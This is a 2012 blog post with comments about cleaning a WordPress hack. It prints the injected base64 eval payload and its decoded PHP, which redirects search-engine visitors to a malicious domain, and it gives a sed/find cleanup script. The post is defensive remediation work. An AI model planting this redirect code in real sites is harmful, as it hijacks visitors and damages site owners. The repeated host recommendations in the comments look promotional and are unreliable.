Articles

WordPress hacked – Redirect to gigop.americanunfinished.com

March 12, 2012 by Sarath DR in Articles, Featured, Internet with 29 Comments

Even if I have changed my servers I have been hacked several times. I could not find out how it hacks into my sever and inserts its php code into all php files in my server. I checked my file permissions and all nothing seemed to be vulnerable. A non-techie could not identify the virus attack since it does not affect the normal loading of the website. But when you visit the website as google bot it will redirect the website to  gigop.americanunfinished.com. If the google webmaster tool is enabled to your website you receive notification from google that your website has been removed from indexing once your website is hacked. Also if you  find  the following php code in any one of the php files on your server you can confirm attack.

 
<?php eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb2dvIikgb3Igc3RyaXN0cigkcmVmZXJlciwibGl2ZS5jb20iKW9yIHN0cmlzdHIoJHJlZmVyZXIsImFwb3J0Iikgb3Igc3RyaXN0cigkcmVmZXJlciwibmlnbWEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ3ZWJhbHRhIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmVndW4ucnUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJzdHVtYmxldXBvbi5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vZ2lnb3AuYW1lcmljYW51bmZpbmlzaGVkLmNvbS8iKTsNCmV4aXQoKTsNCn0KfQp9DQp9DQp9"));
?>

When you  decode the above php code you will get the following one

<?php echo 
 
error_reporting(0);
 
$qazplm=headers_sent();
 
if (!$qazplm){
 
$referer=$_SERVER['HTTP_REFERER'];
 
$uag=$_SERVER['HTTP_USER_AGENT'];
 
if ($uag) {
 
if (!stristr($uag,"MSIE 7.0")){
if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
 
if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
 
header("Location: http://gigop.americanunfinished.com/");
 
exit();
 
}
}
}
 
}
 
}
?>

Since I did not have the back up for all my files I sought help from friend who is working as a sysadmin. He wrote the following shell script to clean the code from all files.

You can follow the below steps to remove the files.

Step 1: Copy the below code and create “clean.sh”

#!/bin/sh

src=$1.hack
dst=$1
 
mv $dst $src
 
sed -e 's,eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb2dvIikgb3Igc3RyaXN0cigkcmVmZXJlciwibGl2ZS5jb20iKW9yIHN0cmlzdHIoJHJlZmVyZXIsImFwb3J0Iikgb3Igc3RyaXN0cigkcmVmZXJlciwibmlnbWEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ3ZWJhbHRhIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmVndW4ucnUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJzdHVtYmxldXBvbi5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vZ2lnb3AuYW1lcmljYW51bmZpbmlzaGVkLmNvbS8iKTsNCmV4aXQoKTsNCn0KfQp9DQp9DQp9"));,,g' $src > $dst

Step 2: Upload “clean.sh” to root folder and give write permission
Step 3: Run the following command

find . -name '*.php' -exec ./clean.sh \{\} \;

Which will remove the code from all php files and keep the old as php.hack extension.

For example, index.php will be pure and index.php.hack file will be the old file after running the above script.

OR you can run the command only for a single file to make sure that the shell script is working properly

./clean.sh index.php

Step 4: Run the following command to remove all .php.hack files if everything is fine.

find . -name '*.hack' -exec rm -f \{\} \;

Tagged , , ,

Share this to

Related Posts

29 Comments

  1. JasonApr 3, 2012 at 2:54 pmReply

    Thanks so much for posting this. I had the same hack and used your help to fix it. Any idea how they got in?

    • adminApr 3, 2012 at 4:36 pmReplyAuthor

      No Idea man!! I have made all my files write protected after that, it might be some wordpress old version security issue.

  2. ThomasApr 6, 2012 at 6:57 pmReply

    When I run the code i get this message:

    find: ./clean.sh: No such file or directory

  3. adminApr 6, 2012 at 7:00 pmReplyAuthor

    Did you upload the file ?

  4. ThomasApr 6, 2012 at 7:08 pmReply

    Yes, I uploaded the file, then I did
    chmod 777 clean.sh

    Then I ran the command you provided in the Root of the server’s SSH.

    • adminApr 6, 2012 at 7:11 pmReplyAuthor

      Are you running the commas from the same location where file reside ?? Double check the path

  5. adminApr 6, 2012 at 7:14 pmReplyAuthor

    You have to specify the file name you want to clean after ./clean.sh index.php If you are trying only for a specific file

  6. ThomasApr 6, 2012 at 7:18 pmReply

    I can show you what I have
    http://gyazo.com/b4abf2c781697f4e523d3c6b3536ec2d

  7. adminApr 6, 2012 at 7:26 pmReplyAuthor

    Could you create a sample php file and try ./clean.sh index.php this command alone

  8. adminApr 6, 2012 at 7:27 pmReplyAuthor

    Or copy the file to public_html folder and try it from there

  9. CynthiaApr 9, 2012 at 2:21 amReply

    This has been happening to me as well. I’m just deleted wordpress and resinatalling it. The databases are fine, it’s just the php files. I’ve been running the Bullet Proof Security plugin and changing the permissions of files as it advises (plus all the index php files under the theme directories), and also running Exploit Scanner plugin which identifies all the eval code that’s in there.

    I hope that the permissions changes will secure my blogs enough so that they don’t get in again. No idea how they are getting in. It’s totally annoying!

  10. IraApr 19, 2012 at 6:51 pmReply

    I would suggest that you sign up for an account with theshosting.com. They provide free malware removal services on anybody hosted on there servers. My site was hacked at blue host and they were able to transfer it from blue host and also remove the malware injection for free!

    They were even able to tell me exactly where the hack originated from as well. They said it came from an outdated timthumb.php file which they were able to update for me.

    They also did a scan of my account and told me all the security vulnerabilities of my account.

    I honestly suggest switching over to them if your website is hacked. They can transfer and remove the hack from your site. Best of all they do this for free.

    • CynthiaApr 20, 2012 at 7:34 pmReply

      thanks ira, I will look at them, do you host there?

      • IraApr 20, 2012 at 7:43 pmReply

        Yup, I have all my wordpress sites with them now. Bluehost was awful. I literally got hacked like 3 times and they did nothing to help.

  11. ryan64Apr 24, 2012 at 7:52 pmReply

    I guess im bit of a newb on this, but can you walk me through how to do step 3. run the comand? where do I put the code?

    • adminApr 24, 2012 at 11:19 pmReplyAuthor

      You need to put the file on the web root folder to check all infected files and run the following command from that folder

      find . -name ‘*.php’ -exec ./clean.sh \{\} \;

  12. alexJul 3, 2012 at 6:26 amReply

    some body can explain me where put the line commands ?
    thank

  13. ScottJul 4, 2012 at 6:25 pmReply

    Hey, as per Ira’s suggestion, I switched hosts as well to theshosting.com. I am not very technical so this command stuff isn’t for me. I just wanted to come back with a review.

    After I signed up with them, I requested a transfer from them. They were able to transfer all the content from my previous host. From there they were able to completely remove the malware on my site. Before this, my site was showing the google attack page for 1 month and I was not able to find anybody that could help with this. Now it is completely fine and I didn’t need to do anything. Not only were they able to clean the entire site, they also told me exactly where the intrusion occurred. In my case, they said I had a php shell embedded in a file called 404.php that allowed the intruder to continue to gain access. They were also able to remove this for me as well.

    I contacted them again to find out if they offer this to only new clients or if this is a service they continually provide. It turns out that they assist with this anytime it occurs on there servers. This is the guarantee they provided me, “If your account is ever compromised, many times we will notice this even before you will as we are always monitoring the logs for suspicious uploads. If at any time, you believe your account was compromised please contact us as soon as possible so that we may find out what exactly was modified and take steps to secure your account. We will assist with this at any time.”

    They are an awesome host! I highly suggest that you switch over to them especially if your site is infected with malware as they will take care of all of that for you!!

  14. adminJul 4, 2012 at 9:07 pmReplyAuthor

    Thank you Scot. My 404.php was not cleared now its fine :)

  15. Severe Attacks on Wordpress websites - ertyuiop.itsaolJul 27, 2012 at 11:30 amReply

    [...] can refer my previous post regarding the wordpress hacking here to resolve the issue and for more [...]

  16. JTPratt MediaAug 15, 2012 at 9:03 pmReply

    So you removed the hacked code, but did you find the source of the break-in? If not it could happen again and again. That’s the most common complaint to a hacked WP website “it keeps happening”.

    We wrote about what to do the other day on our blog:
    jtprattmedia.com/my-wordpress-website-is-still-getting-hacked/

  17. NathalySep 13, 2012 at 3:54 amReply

    If you want to stop this attacks, after remove the hack code of all your files, you should change all your FTP accounts passwords. That works for me! :)

  18. NidhinOct 11, 2012 at 10:14 amReply

    Thanks a lot, it saved my ass.

  19. How to remove malware from Wordpress website? | SkillsYardOct 26, 2012 at 11:31 amReply

    [...] you get the eval base64_decode injection in all PHP files on your hosting, you can use clean.sh script to remove the injected code from all PHP files available on http://tech.sarathdr.com [...]

  20. IosifDec 9, 2012 at 5:54 amReply

    It is extremely important to find out how they got in. You can remove the code but eventually it will be back, if you don’t close the door.

  21. How to remove malware from WordPress website? - MadGuyyyFeb 3, 2013 at 12:51 pmReply

    [...] you get the eval base64_decode injection in all PHP files on your hosting, you can use clean.sh script to remove the injected code from all PHP files available on http://tech.sarathdr.com [...]

  22. How to remove malware from WordPress website? | ScrewDeskScrewDeskMar 31, 2013 at 8:28 pmReply

    [...] you get the eval base64_decode injection in all PHP files on your hosting, you can use clean.sh script to remove the injected code from all PHP files available on http://tech.sarathdr.com [...]

  23. robiJul 8, 2014 at 12:54 pmReply

    Hallo,
    i have 10-15 php files with different codes but all begins with n!

    or

    can i take this for 1 clean.sh for all codes to clean:

    #!/bin/sh

    src=$1.hack
    dst=$1

    mv $dst $src

    sed -e ‘s,eval(base64_decode(“n******”));,,g’ $src >
    $dst

    Thank you
    Robi

Leave a Reply to How to remove malware from Wordpress website? | SkillsYard Cancel reply

Your email address will not be published. Required fields are marked *

*

About
View Sarath D R's profile on LinkedIn

I am a technology consultant and an entrepreneur focused on the following technologies Java,Spring, Android, Angular, Asterisk, Symfony, Cake , Code-Igniter, Jquery , XAMPP, XHTML, AJAX, MySql, Seo, Web Design, Wordpress, iPhone development.

Today’s Tips
  • Generate Codova.jar file from Phonegap project using ant
  • Google map javascript client  to find the geographic co-ordinates  from  Address or post code
  • Update Android main UI from Webview – Phonegap Plugin
  • Jplayer is not working  with HTC One Android 4.3 version browser
  • Regular expression to validate mobile phone numbers starting with + ( plus ) – php
  • Simple pagination script for PHP
  • Useful adb ( Android Debug Bridge ) commands
  • Change the javascript files url to absolute url – Symfony 1.4
  • Set Http authentication header from Client – PHP / CURL

This site uses cookies from Google to deliver its services, to personalise ads and to analyse traffic. Information about your use of this site is shared with Google. By using this site, you agree to its use of cookies. more information

The cookie settings on this website are set to "allow cookies" to give you the best browsing experience possible. If you continue to use this website without changing your cookie settings or you click "Accept" below then you are consenting to this.This site also uses cookies from Google to deliver its services, to personalise ads and to analyse traffic. Information about your use of this site is shared with Google. By using this site, you agree to its use of cookies.

Close